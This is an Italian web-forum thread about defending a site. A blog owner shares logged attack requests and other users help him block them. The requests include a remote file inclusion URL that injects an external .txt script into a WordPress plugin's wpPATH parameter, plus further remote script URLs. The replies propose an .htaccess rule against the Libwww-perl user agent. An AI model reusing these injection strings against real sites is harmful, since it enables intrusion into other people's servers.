- Home
- Categorie
- Coding e Sistemistica
- CMS & Piattaforme Self-Hosted
- Spam tramite il mio blog
-
Spam tramite il mio blog
Ho analizzato i dettagli dei visitatori del mio blog e ho trovato che qualcuno ( o qualcosa) ha provato a inserire queste e altre cose:
http://www.mioblog.it/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://yscfortworth.org/calendar/jester/sei/un/figo.txt?Il browser adoperato è Libwww-perl 5.800 e l'Ip 64.72.112.144.
Il browser adoperato è Libwww-perl 5.805 e l'Ip 209.59.129.102
Penso che qualcuno volesse promuovere quel txt.E' capitato anche a voi?
-
potrebbero essere anche dei tentativi di injection su vulnerabilità dei 2 plugin..
-
Quale istruzione devo inserire nel .htaccess per non far visitare il sito da parte dei vari Libwww-perl ?
-
Posso consigliarti questa discussione.
Si parlava di come bloccare la maggior parte degli spambot in circolazione...
-
Ti ringrazio, ma uso già la lista che mi hai consigliato, ma evidentemente non protegge da queste SQL Inj.
Mi servirebbe qualcosa tipo:
RewriteCond %{HTTP_USER_AGENT} Libwww-perl
-
credo che un:
RewriteCond %{HTTP_USER_AGENT} ^Libwww-perl
dovrebbe andare
-
Provo e riferisco.
-
Ecco quello che volevano fare sul mio sito:
htp://usuarios.arnet.com.ar/larry123/safe.txt
htp://www.freewebtown.com/shellku/a.txt
-
visti così sembrano hacking attempt, sopratutto il secondo dove si cerca di visualizzare i contenuti del tuo db.
io farei presente la cosa all'hosting e eventualmente alla polizia postale se hai l'ip di chi ha effettuato quella richiesta di dati.
su come notificare operativamente, ti consiglio di chiedere lumi nella sezione sicurezza del forum, penso che qualcuno ahimè ci sarà già passato
-
Buono dato che viene aggiornato con buona cadenza dal team, e i riferimenti sui siti di sicurezza o hacker dove si parla di falle non sono moltissimi ( rispetto ad altri script con un medesimo blasone )